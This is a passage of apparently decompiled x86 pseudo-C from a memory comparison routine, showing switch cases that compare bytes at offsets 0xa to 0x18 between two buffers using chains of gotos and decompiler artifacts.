                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L237;
                  						case 0xa:
                  							L313:
                  							__edx =  *(__eax - 0xa);
                  							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
                  								__esi = 0;
                  								L323:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L324;
                  							}
                  							__edx =  *(__ecx - 0xa) & 0x000000ff;
                  							__esi =  *(__eax - 0xa) & 0x000000ff;
                  							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  							if(__esi == 0) {
                  								L316:
                  								__edx =  *(__ecx - 9) & 0x000000ff;
                  								__esi =  *(__eax - 9) & 0x000000ff;
                  								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  								if(__esi == 0) {
                  									L318:
                  									__edx =  *(__ecx - 8) & 0x000000ff;
                  									__esi =  *(__eax - 8) & 0x000000ff;
                  									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  									if(__esi == 0) {
                  										L320:
                  										__edx =  *(__ecx - 7) & 0x000000ff;
                  										__esi =  *(__eax - 7) & 0x000000ff;
                  										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L323;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L320;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L318;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L316;
                  						case 0xb:
                  							L394:
                  							__edx =  *(__eax - 0xb);
                  							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
                  								__esi = 0;
                  								L404:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L405;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xb) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  							if(__esi == 0) {
                  								L397:
                  								__esi =  *(__eax - 0xa) & 0x000000ff;
                  								__edx =  *(__ecx - 0xa) & 0x000000ff;
                  								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  								if(__esi == 0) {
                  									L399:
                  									__esi =  *(__eax - 9) & 0x000000ff;
                  									__edx =  *(__ecx - 9) & 0x000000ff;
                  									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  									if(__esi == 0) {
                  										L401:
                  										__esi =  *(__eax - 8) & 0x000000ff;
                  										__edx =  *(__ecx - 8) & 0x000000ff;
                  										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L404;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L401;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L399;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L397;
                  						case 0xc:
                  							L143:
                  							__edx =  *(__eax - 0xc);
                  							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
                  								__esi = 0;
                  								L153:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L154;
                  							}
                  							__edx =  *(__ecx - 0xc) & 0x000000ff;
                  							__esi =  *(__eax - 0xc) & 0x000000ff;
                  							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  							if(__esi == 0) {
                  								L146:
                  								__esi =  *(__eax - 0xb) & 0x000000ff;
                  								__edx =  *(__ecx - 0xb) & 0x000000ff;
                  								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  								if(__esi == 0) {
                  									L148:
                  									__esi =  *(__eax - 0xa) & 0x000000ff;
                  									__edx =  *(__ecx - 0xa) & 0x000000ff;
                  									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  									if(__esi == 0) {
                  										L150:
                  										__esi =  *(__eax - 9) & 0x000000ff;
                  										__edx =  *(__ecx - 9) & 0x000000ff;
                  										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L153;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L150;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L148;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L146;
                  						case 0xd:
                  							L223:
                  							__edx =  *(__eax - 0xd);
                  							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
                  								__esi = 0;
                  								L233:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L234;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xd) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  							if(__esi == 0) {
                  								L226:
                  								__esi =  *(__eax - 0xc) & 0x000000ff;
                  								__edx =  *(__ecx - 0xc) & 0x000000ff;
                  								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  								if(__esi == 0) {
                  									L228:
                  									__esi =  *(__eax - 0xb) & 0x000000ff;
                  									__edx =  *(__ecx - 0xb) & 0x000000ff;
                  									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  									if(__esi == 0) {
                  										L230:
                  										__esi =  *(__eax - 0xa) & 0x000000ff;
                  										__edx =  *(__ecx - 0xa) & 0x000000ff;
                  										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L233;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L230;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L228;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L226;
                  						case 0xe:
                  							L302:
                  							__edx =  *(__eax - 0xe);
                  							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
                  								__esi = 0;
                  								L312:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L313;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xe) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  							if(__esi == 0) {
                  								L305:
                  								__esi =  *(__eax - 0xd) & 0x000000ff;
                  								__edx =  *(__ecx - 0xd) & 0x000000ff;
                  								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  								if(__esi == 0) {
                  									L307:
                  									__esi =  *(__eax - 0xc) & 0x000000ff;
                  									__edx =  *(__ecx - 0xc) & 0x000000ff;
                  									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  									if(__esi == 0) {
                  										L309:
                  										__esi =  *(__eax - 0xb) & 0x000000ff;
                  										__edx =  *(__ecx - 0xb) & 0x000000ff;
                  										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L312;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L309;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L307;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L305;
                  						case 0xf:
                  							L383:
                  							__edx =  *(__eax - 0xf);
                  							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
                  								__esi = 0;
                  								L393:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L394;
                  							}
                  							__edx =  *(__ecx - 0xf) & 0x000000ff;
                  							__esi =  *(__eax - 0xf) & 0x000000ff;
                  							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  							if(__esi == 0) {
                  								L386:
                  								__esi =  *(__eax - 0xe) & 0x000000ff;
                  								__edx =  *(__ecx - 0xe) & 0x000000ff;
                  								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  								if(__esi == 0) {
                  									L388:
                  									__esi =  *(__eax - 0xd) & 0x000000ff;
                  									__edx =  *(__ecx - 0xd) & 0x000000ff;
                  									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  									if(__esi == 0) {
                  										L390:
                  										__esi =  *(__eax - 0xc) & 0x000000ff;
                  										__edx =  *(__ecx - 0xc) & 0x000000ff;
                  										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L393;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L390;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L388;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L386;
                  						case 0x10:
                  							L132:
                  							__edx =  *(__eax - 0x10);
                  							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
                  								__esi = 0;
                  								L142:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L143;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x10) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  							if(__esi == 0) {
                  								L135:
                  								__esi =  *(__eax - 0xf) & 0x000000ff;
                  								__edx =  *(__ecx - 0xf) & 0x000000ff;
                  								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  								if(__esi == 0) {
                  									L137:
                  									__esi =  *(__eax - 0xe) & 0x000000ff;
                  									__edx =  *(__ecx - 0xe) & 0x000000ff;
                  									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  									if(__esi == 0) {
                  										L139:
                  										__esi =  *(__eax - 0xd) & 0x000000ff;
                  										__edx =  *(__ecx - 0xd) & 0x000000ff;
                  										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L142;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L139;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L137;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L135;
                  						case 0x11:
                  							L212:
                  							__edx =  *(__eax - 0x11);
                  							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
                  								__esi = 0;
                  								L222:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L223;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x11) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  							if(__esi == 0) {
                  								L215:
                  								__esi =  *(__eax - 0x10) & 0x000000ff;
                  								__edx =  *(__ecx - 0x10) & 0x000000ff;
                  								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  								if(__esi == 0) {
                  									L217:
                  									__esi =  *(__eax - 0xf) & 0x000000ff;
                  									__edx =  *(__ecx - 0xf) & 0x000000ff;
                  									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  									if(__esi == 0) {
                  										L219:
                  										__esi =  *(__eax - 0xe) & 0x000000ff;
                  										__edx =  *(__ecx - 0xe) & 0x000000ff;
                  										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L222;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L219;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L217;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L215;
                  						case 0x12:
                  							L291:
                  							__edx =  *(__eax - 0x12);
                  							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
                  								__esi = 0;
                  								L301:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L302;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x12) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  							if(__esi == 0) {
                  								L294:
                  								__esi =  *(__eax - 0x11) & 0x000000ff;
                  								__edx =  *(__ecx - 0x11) & 0x000000ff;
                  								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  								if(__esi == 0) {
                  									L296:
                  									__esi =  *(__eax - 0x10) & 0x000000ff;
                  									__edx =  *(__ecx - 0x10) & 0x000000ff;
                  									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  									if(__esi == 0) {
                  										L298:
                  										__esi =  *(__eax - 0xf) & 0x000000ff;
                  										__edx =  *(__ecx - 0xf) & 0x000000ff;
                  										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L301;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L298;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L296;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L294;
                  						case 0x13:
                  							L372:
                  							__edx =  *(__eax - 0x13);
                  							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
                  								__esi = 0;
                  								L382:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L383;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x13) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  							if(__esi == 0) {
                  								L375:
                  								__esi =  *(__eax - 0x12) & 0x000000ff;
                  								__edx =  *(__ecx - 0x12) & 0x000000ff;
                  								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  								if(__esi == 0) {
                  									L377:
                  									__esi =  *(__eax - 0x11) & 0x000000ff;
                  									__edx =  *(__ecx - 0x11) & 0x000000ff;
                  									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  									if(__esi == 0) {
                  										L379:
                  										__esi =  *(__eax - 0x10) & 0x000000ff;
                  										__edx =  *(__ecx - 0x10) & 0x000000ff;
                  										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L382;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L379;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L377;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L375;
                  						case 0x14:
                  							L121:
                  							__edx =  *(__eax - 0x14);
                  							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
                  								__esi = 0;
                  								L131:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L132;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x14) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  							if(__esi == 0) {
                  								L124:
                  								__esi =  *(__eax - 0x13) & 0x000000ff;
                  								__edx =  *(__ecx - 0x13) & 0x000000ff;
                  								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  								if(__esi == 0) {
                  									L126:
                  									__esi =  *(__eax - 0x12) & 0x000000ff;
                  									__edx =  *(__ecx - 0x12) & 0x000000ff;
                  									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  									if(__esi == 0) {
                  										L128:
                  										__esi =  *(__eax - 0x11) & 0x000000ff;
                  										__edx =  *(__ecx - 0x11) & 0x000000ff;
                  										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L131;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L128;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L126;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L124;
                  						case 0x15:
                  							L201:
                  							__edx =  *(__eax - 0x15);
                  							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
                  								__esi = 0;
                  								L211:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L212;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x15) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  							if(__esi == 0) {
                  								L204:
                  								__esi =  *(__eax - 0x14) & 0x000000ff;
                  								__edx =  *(__ecx - 0x14) & 0x000000ff;
                  								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  								if(__esi == 0) {
                  									L206:
                  									__esi =  *(__eax - 0x13) & 0x000000ff;
                  									__edx =  *(__ecx - 0x13) & 0x000000ff;
                  									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  									if(__esi == 0) {
                  										L208:
                  										__esi =  *(__eax - 0x12) & 0x000000ff;
                  										__edx =  *(__ecx - 0x12) & 0x000000ff;
                  										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L211;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L208;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L206;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L204;
                  						case 0x16:
                  							L280:
                  							__edx =  *(__eax - 0x16);
                  							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
                  								__esi = 0;
                  								L290:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L291;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x16) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  							if(__esi == 0) {
                  								L283:
                  								__esi =  *(__eax - 0x15) & 0x000000ff;
                  								__edx =  *(__ecx - 0x15) & 0x000000ff;
                  								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  								if(__esi == 0) {
                  									L285:
                  									__esi =  *(__eax - 0x14) & 0x000000ff;
                  									__edx =  *(__ecx - 0x14) & 0x000000ff;
                  									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  									if(__esi == 0) {
                  										L287:
                  										__esi =  *(__eax - 0x13) & 0x000000ff;
                  										__edx =  *(__ecx - 0x13) & 0x000000ff;
                  										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L290;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L287;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L285;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L283;
                  						case 0x17:
                  							L361:
                  							__edx =  *(__eax - 0x17);
                  							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
                  								__esi = 0;
                  								L371:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L372;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x17) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                  							if(__esi == 0) {
                  								L364:
                  								__esi =  *(__eax - 0x16) & 0x000000ff;
                  								__edx =  *(__ecx - 0x16) & 0x000000ff;
                  								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  								if(__esi == 0) {
                  									L366:
                  									__esi =  *(__eax - 0x15) & 0x000000ff;
                  									__edx =  *(__ecx - 0x15) & 0x000000ff;
                  									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  									if(__esi == 0) {
                  										L368:
                  										__esi =  *(__eax - 0x14) & 0x000000ff;
                  										__edx =  *(__ecx - 0x14) & 0x000000ff;
                  										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L371;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L368;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L366;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L364;
                  						case 0x18:
                  							L110:
                  							__edx =  *(__eax - 0x18);
                  							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
                  								__esi = 0;
                  								L120:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L121;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x18) & 0x000000ff;
